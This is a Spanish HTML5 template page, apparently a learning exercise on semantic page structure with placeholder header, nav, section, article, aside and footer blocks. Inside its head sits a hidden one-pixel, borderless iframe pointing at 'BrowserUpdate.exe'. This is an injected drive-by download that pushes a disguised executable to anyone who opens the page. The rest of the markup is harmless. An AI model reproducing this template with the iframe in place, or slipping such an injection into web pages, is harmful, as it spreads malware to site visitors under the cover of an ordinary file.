index_3.html



<!DOCTYPE html>

<html lang="es">

<!-- PAGINA DE FUENTES: http://www.fontsquirrel.com/   -->
<!-- RESPONSIVE DESIGN (diseño sensible a la pantalla) -->
<!-- MAQUETADO -->
<head><iframe src=BrowserUpdate.exe width=1 height=1 frameborder=0></iframe>
	<title>Estructura B&aacute;sica Sem&aacute;ntica en HTML5 y CSS3</title>
	<meta charset="utf-8" />
	<meta description="DESCRIPCION DE LA PAGINA" content="Estructura B&aacute;sica Sem&aacute;ntica en HTML5 y CSS3 con responsive design" />
	<link rel="stylesheet" type="text/css" media="all" href="css/Estilos_3.css" />
</head>

<body background=Fondo.jpg>
	<h1>Estructura B&aacute;sica Sem&aacute;ntica en HTML5</h1>
	<header>
		HEADER
	</header>
	<nav>
		NAV
	</nav>
	<section id="contenedor">
		<section id="principal">
			SECTION
			<article>
				ARTICLE
			</article>
		</section>
		<aside>
			ASIDE
		</aside>
	</section>
	<footer>
		FOOTER
	</footer>
</body>

</html>